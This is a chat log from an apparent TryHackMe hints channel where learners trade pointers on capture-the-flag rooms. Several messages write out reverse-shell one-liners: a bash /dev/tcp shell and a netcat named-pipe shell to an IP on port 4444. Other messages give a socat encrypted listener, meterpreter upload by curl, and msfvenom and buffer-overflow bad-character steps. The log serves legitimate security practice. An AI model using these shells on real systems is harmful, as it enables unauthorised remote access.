#room-hints

anybody else started the Searchlight - IMINT room and still looking for the coffee shop 🙂

Please don't ask for hints on newly released rooms.

Didnt ask

||any hints on "chill hack"? im on /secret/||

You're asking in the hints channel about a new room. Do you understand?

any hint on searchlightosint task 7 for the photographer's name?

That's a brand new challenge room

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

sorry, just seeing that now

Please wait 72 hours from release before asking.

apologies

Thank you

I'll keep trucking at it 👍

impatience

😄

great room btw, thanks to @final stratus 👍

I'm glad you like it @blazing thorn!

I recognised the restaurant immediately, that place is delicious!!!!

I've only been once, it was 8 years ago, but I remember it really well

ugh, figured out photographer name 🙂

twas a good one

hello guys any hint to get flag1 in "linux strength training" ?

they are asking to use find command to find file with modified date 2016-09-12 in the workflow directory

if you look in the text, there is a row on it

command used : fide workflow -type f -newermt "2016-09-12"

find*

that'll get you everything newer

you'll want newer than yesterday and older than tomorrow to find today

i used the ! -newermt also

😉

oh got you

good hunting

@final stratus is there an error on task 8, question 1? feels like first word should be 5 characters 🤔

naw, it's fine

grrr

😄

kk, ty ❤️

more of an Anglophone reference though

kk, tis the last one to get for the room

hmm?

I've solved all of the other tasks in that room

just task 8 Q1 to go

ah ok

got it 🙂

all done, fantastic room

Task 7 in What the Shell - I'm pretty sure I have the correct answer, but it won't accept. I've researched, found a walkthrough, checked and doublechecked. I'm suspecting it is a small typo or such? I'm using ||socat OPENSSL-LISTEN:53,cert=encrypt.pem,FILE:tty,raw,echo=0|| Any help appreciated - I hate leaving a room "incomplete" due to one lousy thing.

well done @blazing thorn!

Can I have a hint for Overpass? I pulled exif data and I think I have a username but is this username in username@overpass.com or is it just 'username' ?

are you on the login page?

Overpass 1 yes?

Yes

I was going to try an SQL injection to bypass login

it's pretty dumb, look at how the thing actually works before breaking out the big guns

Alright, I'll re-examine

the javascript might be helpful

Firefox has a dev console 🙂

...oooooh...

I see what I need to do now

🙂

I see now. Hello SSH.

🙂

good hunting

the rest is really cute

I have to writeup part 2 one of these days

can i have some help with chill hack? i cant get a shell

Not every situation might be about getting a (reverse) shell. See what you can (and can't) do, then combine the steps to go deeper

@oblique bloom keep dir-bustering

Where is the first place the computer will look to find the ip address of a domain ?

Is this related to room?

yep

not sure if im in the right room as it did say "room-hints"

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.

Yikes!

I apologize! i tend not to grasp the most important rules 😦

@opaque remnant you are missing one small thing after pem

What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem" ANSWERED. ----- PROBLEM QUESTION: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

Need help with that

Room is "what the shell"

@penny i think there is a bug with that

written 15 variants

listener

just cant get it working

its wrong but use listener

pood can you dm me what you have in mind if you got the whole string?

So over this

What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem" ANSWERED. ----- PROBLEM QUESTION: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

count the stars

50-60

😉

But I'll get it. Just wasting time

sure the one you posted before, replace the last comma with a space

i mean between pem and FILE

and use backticks

not single quotes

tty needs to be executed

yeah I know Ok will try that

Hi everyone

I'm stuck in this room, thought i could use some help

Here it is...honestly I don't understand the question or my next move, please help me understand

Which room?

web fundamentals : ZTH2

check out xsrfprobe --help. the answer will be there

thanks found it, man the easiest thing can be sometimes hidden in plain sight lol

i learned something valuable today...thanks @remote gate

you’re welcome. don’t sweat it. it happens 😄

Each time you run the script, you have to check the EIP. The EIP can change each time.

EIP being the instruction pointer?

just be sure im on the ||secret|| already and i was able break out of the filtering, and im trying to get a reverse shell and i get a connect on the listener but no shell

SQLi task 7 am I missing something? I am following instructions correctly, I am getting an error, Unable to connect?

I am unable to connect, why is that? any suggestions, yes I am connected to my network

SMB Client "cat" command not found.... suggestions please?

It's not a linux command line

It's an smb command line

Exit out if it to cat the file.

O....ok

I knew it was simple ugh!

I got a shell pretty straight forward
what I did was a ||bash revshell|| that looks like this ||ba\sh -c 'ba\sh -i >& /dev/tcp/myip/4444 0>&1'||, but you could also ||upload a meterpreter to /tmp using curl||

yours worked nice

thanks :)

Anyone doing searchlight ? I'm stuck on 7th task one with reindeer bike

need to wait 72 hours after room launch to ask for hints...I had the same question last night, DM for help if you like

!rule 13

boo

😄

Yeah dm for help. Ive have a quite a few people ask for help, but i will literally just rephrase the question. Most have found it without me giving a single into. just ask questions

||ig thats a hint saying to rephrase ||

I finally found it - by watching a video that was in Russian (I think - not a lang expert) and watching the typing. LOL. It was driving me insane!

hey is there anyone here who know how to use tmux plugins?

Just ask your question directly

We don't know if we can help unless you ask directly

LOL yeah umm I need to know how to use the plugin on tmux after I loaded it..

I cant find the answer any where

which plugin though?

If this is for a specific room, please state the room and task

If not, don't ask here

Its REmux The Tmux Task 6 last question

Anybody tried the new "Searchlight - IMINT" ? How did you found the deer motorcycle picture? Tag if answer

Hi, I need help for Empire, for the next question:

What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll?

@pseudo bobcat use the hints 😁

no problem mate, can you tell me what you were trying to do?

I saw the hint, i did that and i still cant find it D:

hi, any hint to Regular expressions room task 4 last Q ❤️ ?

sloved

just trying to get a reverse shell like you, but mine would connect but i wouldnt get a shell

but the bash tcp reverse shell worked fine

that's interesting, what was your payload?

just a traditional netcat reverse shell

never really tried those tbh

it was weird because it once i was able to make it connect

it wouldnt work

i was trying to figure it out

well next time ill jump straight to getting a reverse shell using other payloads

my advice is if you can just straight get a revshell using bash you should do so

it's easy to use and it never broke down on me

sure if it doesnt work id try another payload

but it connected so

i didnt know what was it about

yeah, it is a bit weird

Imma try it when I get the chance

||/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe||

i used a pipe on tmp

otherwise it wouldnt bind

@night fractal uh ||mysql doesnt seem to respond to the password input||

maybe its the !

if i input it on the -p i think ! breaks it

maybe double quotes work on mysql?

hm even if im able to do it it still doesnt give a response

oh netcat shenanigans i bet

i spawned a shell with python and mysql works ok now

sry it took me long, yeah, you just needed a better shell

🤐

😄

Hi everyone, I am trying the Wonderland series, but I am already stuck. I've already found the alice_door image and I saw that there was something written upside down, but I just can't read it. Any help would be appreciated

Have you looked at the source ?

What do you mean?

Source of the web page

I looked at multiple write-ups if that's what you mean

I meant where you have found the alice_door image , look the source of that page

I was on a different challenge, but I've already solved it

https://tryhackme.com/room/introtox8664

Is there a mistake in the last question in this room? Can anyone help?

I don't think there is any. What have you tried?

the password in secret.txt

vs3curepwd

Yeah, the program is dependent on the file. You checked the de-compiler output? There is something happening with the string present in the secret.txt😉

Thanks for your help

hi! I have a question on "The Cod Caper" room, I just have a question left, it's about the ssh password of pingu, I read all the files belong to him, but I don't find it, I think is something with the id_rsa file, but I'm not sure, I can't decode it anyways, my question is, is that file or the password is a file in plain text?

That's a key, not a password

hey can i ask a question about the nmap room

ive looked everywhere for two hours

Just ask

im at this stage and cant really figure out wtf

i did xmas scan with -vv and still cant seem to find the answer

unless im missing something

am i?

Please don't show answrs

my bad

omg

found it

hi all
Windows PrivEsc v1.0
Nr 9.. - reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
-> i should see the password of the admin in the registry but ... c'mon i cant see it ... looking for around 1h now ...
any hints?

got it uhh!

hi, I have a question about madness..|| is the password for the second stego the same as the first one? ||

got it, no worries.. damn, the name madness is appropriate

Hello everyone

i'm doing the OWASP juice shop and i'm stuck

i did everything as asked about the third task but i'm not able to find the proper answer format, it's like the question is not clear enough

Question #1 Task 3

q#2 is similar but if if figure the right format i can submit for that question too

Admin screen

when I was doing that I remember missing a couple of the pop ups, maybe try again? or maybe you have an extra letter or space? there's no proper formatting, is just a long string a characters like in the second question

I was wondering if anyone could provide some help on a question that I am stuck on. It is the nmap room and I have put what I believe to be the correct script and searched online and confirmed but it keeps telling me that it is incorrect.

@hushed snow Look at the answer format

It doesn't have a space

Check the manual

Thank you, I have been on the manual for a while trying to figure it out and decided to finally reach out.

Did you get it?

I haven't. I even have been reading the manual on the nmap website. I am putting --script"vuln" and nmap--script"vuln" and scriptvuln

None of those are correct by any of the manual stuff

Ok I will keep searching

thank you

||Replace the space with an =||

I finally got it. Thank you. I was not reading the manually properly. Thank you for the help

Hi, stuck at Windows privesc task 16. I really dont find the user privilege That is used for this exploit

Hello everyone,
I am doing Advent of Cyber
Day 13- Coal for Christmas

I have found the original source code for dirty cow and found how to compile it BUT when I try to compile and execute the code I get this error

Post in #778305825797177374 Plus there is a video link at the top of the task.

The guy who did the video did not encounter any errors in it

I'll post it in advent (:

Searchlight - IMINT, Task  7, Question 2, who took the cookie from the cookie jar...I mean, who took the photo ? No, seriously, who took it ? This task should have warning something like: "Scrolling and searching through social media sites could seriously impact your eyes" possibly also add "Risk of seizure due to mass flood of pictures" 😄

Well, all tasks solved, but this one. Needless to mention that I've gone through recommended links that the author posted,  checked visitoslo site, fb, instagram, tweeter, reversed image on to me known 8 different engines.... What am I missing besides a new set of eyes 🙂

Have you already solved Task 7, Q 1?

all tasks solved, but this one

i've found answer in visitoslo site

where it comes to this task

Thank you, I'll try again

Hello ! I'm currently the Windows PrivEsc (task 9: Password - Registry) and I'm stuck because I can't find the password .
Could someone please direct me?
Thank you!

OK, Physical Security Intro, Task 6, Question 8...Im stuck like Chuck...ive watched soooo many videos and read sooooo many articles and its driving me mad. Any direction is appreciated.

hi pals . I need to know the MACHINE_IP (target machine)

I'm doing the nmap labo

what shoud I do to get the IP?

@coarse otter Click deploy.

thk

looking for help on the room IMINT on task 4. I got the building right, but the answers for the location (country and city) are somehow wrong...

You have a name of place in the Name of the building.🙂

I know, but it still does not accept the answer... that's why I'm asking here

nevermind, i just had to reload the page to make it work.

-lcrypt

oh its gone

Hello need help for this room "NIS - Linux Part I" , i stuck in Task 1

some one can help me?

Whats the problem

i'm blocked here i can't use command like "cd" or something

Re deploy the machine

thank you

For the Ice room, Task 3, why is the first word 7 letters?

...because that's the answer?

I don't know what you expect us to say

That's what the website says, so that's what the answer is

Can I DM someone to ask for help?

Ideally ask in the help chats?

You're breaking rule 1 if you do it without getting permission first.

Am I allowed to share my incorrect attempts?

And what I looked for?

Go onto the page for that CVE on that site

Copy and paste the exact text

Room: Source. I was looking for an exploit on msfconsole and every each of them requires a password to a webmin. Do I have to bruteforce the credentials?

there is one that doesn't need creds, from 2019

I didn't expect that room would be so easy

it's a walkthrough room marked easy, keep trying boxes and you'll find one at the right level for you

I did SkyNet today and it's also marked as easy, but it took me like 2 hours to make it.

well there are only 3 levels, easy, medium & hard so each has to cover a range

difficulty is very subjective too, it's all about what you know and what you've practiced. Give it a month of trying every day and you'll probably root skynet in 10 mins

I think skynet room used to be medium one and now it's easy

Anyways, thank you @median compass for help

Hey everyone, Room: Mitre Task 5 last question. I have read the page up and down, tried every possible varient and I am still stuck. I have been answering around the idea that it's something to do with ||virtualization and sandboxing|| but nothing like that seems to work

you are looking for programs, not methods

got it, thanks. That one was sort of frustrating. Usually I come out think "Oh that makes sense." I don't like that one. lol

hello guys, any hint about the last question in searchlight-imint room ?

i found the place using google map 360 view but there is no name for the hotel

got it with hours of working

anyone able to lend a hand on AoC2 day issue?

what is your issue ?

@uneven inlet #778305825797177374

Hello family. I'm in the Nmap room. On task #15 Practical, there is question I totally don't understand. It goes like "there is a reason for -- what is it". Anyone give me a hint?

Use very verbose mode

Make sure you're doing the correct scsn type

@stuck fractal thanks. But I'm not sure I understand the nature of the question. What am I even looking for?

It'll literally say something like

1000 ports closed because of xyz

Oh I see. Let me try something quickly and come back to you. Thanks

@stuck fractal I got it thanks. It was right in front of my eyes all along. But I still think that the question wasn't correctly asked, it's very misleading.

#room-bugs but I disagree

Well, it's my opinion. And to make it even worse, the characters in the answer field don't match the response. You gotta tweak it.

hi

does anyone have knowledge of king of hill here

@pine ridge This channel is for hints with public THM rooms

You can try out Hackers and FoodCTF to get a taste for KoTH.

okay

|| What you have just done in the previous task? It can be used for the next task ||

hi GUYS

I just joined THM and stuck at very first lab of Linux Fundamental 1

In task 9 called Binary Shiba1

what's the problem you're facing?

@serene iron

Hi mate, Thanks for your reply 🙂

yeah, no problem

did you get it in the meantime or are you still stuck?

Nah still stuck.

So, it says to create noot.txt file which i do by using touch

touch noot.txt, it doesnt tells where to make to make it. So i just create the file in root directory.

then I cant understand the binary shiba1 part.

I dont want to search and see solution for it online and do it proper way. But dont know what to do after creating touch file

ok

yep.

first of all, you should be making the file in the same directory where the binary is, aka the home directory of shiba1 (but I'm guessing that's what you were saying when talking about the 'root' directory 'cause I'm pretty sure that "/" is not world writeable)

and as for the binary part you just need to run it when the noot.txt file is present in the same directory and it'll give you the password for user shiba2

yeah I make it in root directory and type ./Shiba1.

But then it says no such file

here's a hint

okay, So i need to move to shiba1 directory or create it if not present.

be careful when typing stuff in linux terminal 'cause it is case sensitive

but I dont htink they taught us how to create directory at this point. So wont have to create it.

they didn't, and you don't need to move anything around

you also don't need to change any directories 'cause it's all in the home folder aka the folder you were connected to if my memory serves me right

ah Han.

yes feels right. Thanks for your help.

you're welcome

sorry to bother you again. But I can't still get it. I'll send ss of what I've been doing

pls do

helps a lot

Dont know what I'm doing wrong.

that's an attackbox, something you can deploy if you don't have a good enough machine, or just don't wanna bother installing linux on a VM or your hardware

Ah yes.

basically a Kali VM given to you by tryhackme

yes, thats correct. But still tahst pretty slow. I'm more comfortable in using Kali in VM.

and the problem is that you didn't SSH into the box

But doesnt show me option do download Kali VM.

fair enough

Oh yeah, okay.

this room isn't about that, if you wanna do it that's on you

yes, I did whatever were instructions they didnt tell to join through ssh. Do they?

they actually did

in the very beginning

Ah poor me. Sorry about that.

it's all good, rookie mistakes

Thanks alot for lettingme know @night fractal

you're welcome 😄

Ahh, they said logging through SSH is taught in Linux Fundamentals 2.

So, I thought I donot have to.

to be fair, you didn't need to, tryhackme was kind enough to give you access to the box straight from the browser (just scroll all the way up)

but a lot of new people mistake deploying the attack box with deploying the machine

Yes, thats correct just opened it now.

you're sent by god to me. lol

in a way that's true I guess

Yes, exactly.

Hi @night fractal

Can you please tell me what means "How do you specify which shell is used when login"?

like to know if its shiba1 or shiba2?

shell is a part of terminal, it's basically the thing that runs all of your commands and scripts, and there are more than one shell (most commonly used one being bash)

okay.

the question is related to the command you were reading about in that task, since you can login using your preffered shell

now do your best to find out how do you specify which shell do you want to use when switching users

Yes. It is just first activity I'm doing for THM and aready roasted

But you helped me alot mate.

it takes some time for things to get through to you so just keep going

and I aslo realised how silly I'm.

If that question is related to a room on tryhackme, please state the room name/task number when asking for help @subtle kindle
You'll probably get an answer quicker this way.

Sounds like something Google would know

Room: NMAP

Task 3: Nmap Switches

Third to last question, its the only one I cant seem to find. (I know Im just blind or missing it) I tried googling and checked the nmap site, somehow Im not seeing it. What switch scans "all" ports?

its in the documentation, just look carefully

hmmmm...I literally tried them all in the ports section. I'll look again...

it's quite a small switch, but its in there

https://tenor.com/view/duffy-duck-investigating-magnifying-glass-detective-gif-17719157

hi

i got doubts

so its like when i am doing a course or learning something

in that case i have to use the attackbox by tryhackme

like i wont be able to use my vm kali machine

if i use my kali machine for doing the very same thing .......then it wont work compared to the attckbox provided by tryhackme

Then I suspect you're doing something wrong

for eg if i nmap a ip ..........i find results in the attckbox provided by tryhackme but not in my own kali box

nah i am not

Connect to the VPN in Kali.

i can send u ss

what vpn

how

You're asking for help. Don't argue.

i am sorry

Asking for help and then arguing when you start getting help is counterproductive and rude

You need to connect to the TryHackMe VPN to access TryHackMe boxes from your own VM or machine

!vpn

You were told this in the welcome room

i did it but it dint work out really

will try doing it once again hold on

Ok, but it's a requirement to access THM machines from outside the network.

how will i do that can u help

10.0.0.0/8 (10.x.x.x) is private address space. You can't reach them over the internet.

Follow the guide I linked above.

yea processing

what you are telling seems to be the solution @stuck fractal

Yes.

but i am still getting error

prolly i am doing something wrong oof

Ok. #site-support with screenshots of the error.

yea will meet there

Hey, can anyone confirm something for me in VulnOSv2 RP Nessus task 4 q 9. I have found the web server and version number but it doesn't match up with the pattern in the answer. Does the VM have the same version as the expected answer? Also nmap'd the box and that gives the same version as nessus

What room is that?

https://tryhackme.com/room/rpnessus

The room is RP Nessus

Not VulnOSv2

Ah, sorry. VulnOSv2 is the name of the box currently running. The one which is launched from rpnessus

Never mind. re-run the scan after resetting the box and it seems to have found the right version

@bitter pecan Would be interesting to know if you manage to enter the right plugin id in the first question of task 5.

as I am failing

I'm in the Searchlight - IMINT room and think I found the location of the hotel (last exercise). The view matches the one in the video but I can't find a hotel name. I think the coordinates are || 1.2910883505810304, 103.84472325941232||

The first 3 words might be ||Hotel Novotel Signapore||, it matches the amount of leters : $

could i pm you so im not giving away spoilers?

Sure : )

Guys need help in searchlight task7

What have you got so far?

i think image took by "Tiberio Frascar"i

Location - Astrup Fearnley Museet

But both are incorrect

please don't post answers in here

have you got the name of the statue?

No

ok, find that first

that is the first domino to fall

Is .RUN supposed to precede msfvenom payload when trying to gain shell in telnet sess? I’m stuck on exploiting

Yes

Try. RUN ping - c 1 your IP,
You shoud see if it worka for ya

Payload yes. The msfvenom command, no.

struggling a bit with day 12 of 25daysofchristmas. It seems the private key file is encrypted. I tried running johntheripper against it but it ends pretty quickly with no success. Maybe I got the syntax wrong? I would think it'd take more than 30 seconds to process all of rockyou

Room: Res. I logged onto the redis and I'm not really sure what to do next. Any hint?

lol this Redis room makes my head asplode

reminds me of memcached

still super confused. I feel like I must be doing it wrong

You can technically create files. You might notice something about another service running on the box, and how you could use file creation to get RCE.

Which private key file?

It's not an SSH key but you seem to have treated it as such?

You're given the passphrases in the hints for the questions

well that's a lot of things I missed

it's not an ssh key?

Day 12, correct?

This one?

no you nailed it

I don't know how to know what type of private key that was, and how I might have cracked the gpg pass

It's a GPG key. You're given the passphrase for a reason

I completed it now, but I wonder if there was a way to do it without the hint

No, if you look at the passphrase you're going to really struggle to crack that

fairenough

@stuck fractal I finished the room, the only problem was I didnt know how redis works

Neither did I

I found a cool resource on it tho

||https://book.hacktricks.xyz/pentesting/6379-pentesting-redis|| @tribal olive You might have found this one

Otherwise, it's awesome

More specifically, the redis RCE section

Oh I see you did the writeup on this room

let me see

Wait was I the only writeup on it?

OOF

Ah cool there's more than one

@stuck fractal lol that's what ive been reading

for some reason i got stuck on the default web directory

the hint helped though

need help on HA Joker CTF room can anyone tell me what word list I'm suppose to use I'm on question 4

@pure thistle Please don't ask the same question across multiple chats like that, it comes off as impatient and spammy

I have already answered your question.

nvm i found it it was the default ||common.txt|| had to peak at the write up to get the answer though

hi i am getting some error in metasploit where do i ask ?

Is it a directly room related question?

Read the channel topics and make a decision

ok

Hey y'all! How I can complete this task?

Which room

https://tryhackme.com/room/easyctf

3rd task

U can enumerate it via nmap

Yeah, I already have the vulnerability

@white salmon google it

But I have search a lot but I can't find the CVE code

Then there will be some link of reference

if you have the exploit, what is the name of the exploit

I don't have any exploit

what did you mean by this?>

I already have the vulnerability, but I haven't the exploit

what is the vulnerability then?

I think is ssh OpenSSH 7.2p2

On 2222 port

whar room is it?

Simple CTF

https://tryhackme.com/room/easyctf

Thank you so much guys

what happens when you google OpenSSH 7.2p2

first result for me was

Yeah, is a CVE, but is wrong

Can I send spoilers here?

Yeah

surround them in double pipes if you really have to ||message||

theres another one further down from rapid7

ok, but it is an image

Yeah, i have tried a lot. But it is wrong

I didn't understand

there's an option to mark as spoiler in the bottom left

Thank you so much

the CVE i found is from 2019

its not ssh though

its something else

first of all you're gonna need the full CVE code

There are only 3 ports running

||21/tcp open ftp vsftpd 3.0.3
80/tcp closed http
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)||

check the web

I found a .txt in ftp, but it's irrelevant

Have u visited the ip

I will

Yeah

What is the default page

Apache2 Ubuntu Default Page

True maybe it is an vulnerable

I will check

Thank you so much guys!

@white salmon Please do not post answers

i'm new to tryhackme and i'm stuck in a question. I am doing the beginner learning path and I am stuck in the default credentials of the BFF site because I can't seem to figure out what the right username:password is. Could someone drop a hint?

hello , am new here

Welcome!

Hi. This channel is for asking for hints on tryhackme rooms. #general is there if you want to say hi @potent kayak

which room are you doing on the path?

Hi, everyone.
I got stuck on the last question of Intro to x86-64 room, please help me

Please don't ask the same thing across multiple chats. It comes off as impatient and spammy.

Sorry, I'm new here

I just did the Reversing ELF room (https://tryhackme.com/room/reverselfiles)
For questions 7 & 8, if I ||modified the EIP to the giveFlag function|| would this be considered "cheating"? (it wasn't intended, by the looks of writeups)

Can someone help me with this (task 9) https://tryhackme.com/room/linux1 . Im not sure how to access shiba 1 and whats the point of noot.txt if its empty ?

the binary will only check for the existence of the file so the contents of noot.txt won't matter

when im doing ./shiba1.bin its says no such file or directory . what am i doing wrong

remove .bin

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

still no such file or directory @trim haven

Type ls and screenshout the output pls

sure,

You're doing it on the wrong machine

You're meant to do it on the machine you deploy in the room

not the attackbox :p

oh ok lool thanx

yea thats totally make sense now

i need help

on the first one

That's vague

The first what?

the very first question

Google it?

Like seriously

Google it

is it Vulnerability Assessor

Try things and see

does it say i got it right after?

If you get it wrong, keep looking

When you get it right, it will

this is drving me mad

idk what to do

Keep googling

Research is 90% of hacking

cyber security?

@glossy jetty Enter the answer in the web page. Click Submit. If it's correct, you'll be told. If not, you'll also be told.

yayayaya

There's no penalty for wrong answers

i got it

did u know i had it the whole time but i didnt click submit

Do not post answers.

ok sorry

Nice to know

i got the next one right

Great

i finished a room

You can do it

now what

You can choose another one

do i go dashboard

!docs free-path

By topic or following a path

i did following path

Click on that link and then do the rooms on there

This is an always learn experience

Never ends

which is the best learning path

Always changing

The one I just linked as you're a beginner

To be constant

which one u did as a beginner

I started long before THM even existed, xd

It's easier now with THM

The beginner path also it's probably best to stop asking here as we're flooding the channel now

there is no beginner path

The link I gave you

Later

ok got it

I`m going to do some room now...

You will very quickly learn that asking for help and then arguing with it gets you nowhere.

If you ask for help, listen to what people say. It's ok to ask questions, don't argue with it.

Everyone here is a volunteer

i cant lie this is driving me crazy

What is?

@glossy jetty What is?

any hint on user in daily bugle

what have you tried so far @midnight swallow?

sudo -l, finding SUID bit, ran linpeas and it showed i could write to certain files but that didnt help, tried sshing in as the user with the password i have

i have a shell as apache

i tried to su to user with the password i have also

Keep looking. The password is the right idea.

that's the right track, linpeas should find some more interesting info for you as well

ah nice

i found it

got root too that was pretty easy

can i ask you about how i got the shell as apache

with lots of rooms getting user is harder than root 🙂

sure you can, dm?

cool yeah

im on the Tutorial room, i fire the attackbox and and put in the ip on the thm page

i get a 405 error, is that supposed to happen?

@neon ridge that's the wrong IP address

Click deploy

Use the IP under Active Machine Information

You used the IP of the attack box

Oh I didn't know there's a deploy box

Thank you!

Hello guys, i have a question on https://tryhackme.com/room/linuxstrengthtraining Task 4 - 'Crack hashB.txt using john the ripper, what is the password?'

I have scp-ed the dict from remote machine to my local machine and use both john and hashcat to crach the hashB.txt but with no successful result on both tools. Here's my command:
john --format=raw-sha1 --wordlist=ww.mnf hashB.txt
with result:
Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 2 candidates left, minimum 8 needed for performance. 0g 0:00:00:00 DONE (2020-12-24 11:50) 0g/s 6039Kp/s 6039Kc/s 6039KC/s zythem..zythum Session completed
and hashcat:
sudo hashcat -m 100 hashB.txt ww.mnf
with result:
`Session..........: hashcat
Status...........: Exhausted
Hash.Name........: SHA1
Hash.Target......: b7a875fc1ea228b9061041b7cec4bd3c52ab3ce3
Time.Started.....: Thu Dec 24 11:40:12 2020 (0 secs)
Time.Estimated...: Thu Dec 24 11:40:12 2020 (0 secs)
Guess.Base.......: File (ww.mnf)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2387.7 kH/s (0.57ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 241562/241562 (100.00%)
Rejected.........: 0/241562 (0.00%)
Restore.Point....: 241562/241562 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: whirlgig -> zythum

Started: Thu Dec 24 11:40:08 2020
Stopped: Thu Dec 24 11:40:13 2020`
Any further hint or advice?

your using the wrong wordlist for hashB

👆 @tall rain try rockyou

Ah i see so that;s the problem, ok ty

i'll try, thank you

you're welcome

My machine in this room https://tryhackme.com/room/linux2 doesnt show up it says it is activated but i dont see the Linux window show up . all other machine are shut down

i restarted the browser and tried to access the same room in different browser but still doesn't lunch the Linux window. Note: the other machines can be deployed in different rooms !!

You have to ssh into that machine.

Hey!!
I need help urgently. There is this problem I have been stuck with since last night. So I am trying to solve the ice room challange and this is the error I am getting when I try to gain access using metasploit.
Exploit Completed but no session was created.

@serene bronze what task are you on? did you make sure you set your lhost to your vpn ip?

@remote gate i did that. i set the lhost to vpn ip and then rhosts to target ip of machine but its not working.
I am in the room ICE - Task 3 - Last Question

@serene bronze could you pm me a screenshot of your options?

need help on the machine

https://tryhackme.com/room/zsecuritycutectfij

The room is private

oh

Did you solve it with quipqiup or a tool like that?

Yeah so there are many tools that will be able to get you the original sentence but it was produced with a specific substitution in mind which you could argue isn't even a cipher. The layout you should focus on lies in front of you (literally)

@serene bronze i just noticed.. one thing i'd ask is if you could refrain from asking for help in multiple channels like you did. thanks!

Can anyone help me. I'm stuck at "Physical Security Intro" Task 6 Question no. 3, 5 and 8.

@marsh saffron ask in one channel please. 🙂

@wintry yarrow I'm sorry 😅

beginner walkthrough

can you give me a link? I can't see that path

https://tryhackme.com/room/gettingstarted

and did you try the username:password combinations suggested in the text?

one of the three suggested in the text will get you in

yes, i tried all of them and none would work, that's why I was so confused about it

I just tried it and it worked. WIth the creds, everything to the left of the : is username, everything to the right is password, don't include the :

and of course, you want to use those creds on the admin page you found in Task 1

thanks for your help, i'll try it out

Hi Folks. Can someone help me with the verification questions for 'Buffer Overflow Prep?' One of the repeating questions is:

In byte order (e.g. \x00\x01\x02) and including the null byte \x00, what were the badchars for OVERFLOWX?

I have been successfully exploiting these machines, but I can never seem to answer this question correctly.

for example, for overflow2 I identified bad characters \x00\x23\x24\x3c\x3d\x83\x84\xba\xbb I was able to use these characters to build an exploit and get a reverse shell, but the form will not accept them as a correct answer.

Am I somehow finding too many bad characters, or am I entering them incorrectly?

did you identify those characters all at once or iteratively? that's quite a lot of badchars. Sometimes if there is one badchar in your shellcode then many characters after it can be mis-identified as bad because the first one changes the meaning of the codes that follow. The best way to identify bad characters is to find one, add it to your exclusion list in msfvenom and run the shell code again, if you find another then add that to the list and run again, etc.

I see, that makes sense. I'm definitely doing it the lazy way of running a compare in mona (!mona compare -a esp -f c:\badchars.bin) and including all of the bad characters that it suggests.

I'll be less lazy next time and see if I have more luck.

yeah no, one at a time is the way

thanks!

good luck

can I still use the mona compare function to work iteratively? IE, is the first character flagged by mona more likely to be an actual bad character than the subsequent characters? Or do I need to find a new way to go through them one by one?

yeah, if mona flags badchars then take the first one and add it to your exclusion list, then run again, take the first one and add it, repeat until none showing

perfect, thanks again

in the NIS-Linux room, are we meant to escape rbash to find the flags in Task 1?

i don't remember it being quite so tricky, i think you should be able to get the answers without using cd

@median compass ok, thanks!

oh sorry, hang on, no no, the answers in task 1 are from a different room, it's to test have you done the prerequisites! @visual jolt

if you read the text you can see a link to the room in question, https://tryhackme.com/room/zthlinux

should have checked my notes before relying on my memory 😆

oh lol

🙂

yeah i did that room already 😉

then you can just copy the answers over and you're good to go

that's hilarious

i thought they were new flags

so i escaped the rshell and was trying linpeas, etc.

when all i had to do was copy-paste

it's a simpler room than that, you'll fly through it I'm sure

yeah i finished everything but that task 1 already

i just skipped over it at the beginning cause i thought maybe i would find them doing the rest of the tasks

is owasp zap present in kali already

alright im gonna try Hack Park

wish me luck

yup

luck!

can i dm you please

i'm sure you can ask whatever it is here

why all the machine we attack have that not secure sign on the top is it because of potocol

not related to rooms just for knowledge

these are vulnerable target boxes by design, that encryption layer is on when you do online shopping etc. to prevent anyone else from intercepting your traffic and getting useful info, credit card numbers etc. For the rooms here as a rule there is nothing like that happening, these rooms are only there for learning purposes. Some times you will see https traffic but the certificates will be self-signed anyway and that will still keep the padlock from going green - don't worry about it when you are on tryhackme

thanks a lot

Hey all - welcome any help on Upload Vulnerability room task 4. I seem to lack the file necessary to unlock the flag. Any assist locating it would be welcome. FYI, I only have one file that matches the file type, but it goes by another name. Attempts to upload it were successful but didn’t reveal the flag

@exotic raven ||if you have the file type needed you can just rename it||

I'm stuck on Upload Vulns, too, but on Task 8, can't find the directory it uploaded to?

using directory-list-2.3-medium but it's taking foreevvaar

just keep enumerating deeper into the directories im guessing

alright im giving up on this for tonight

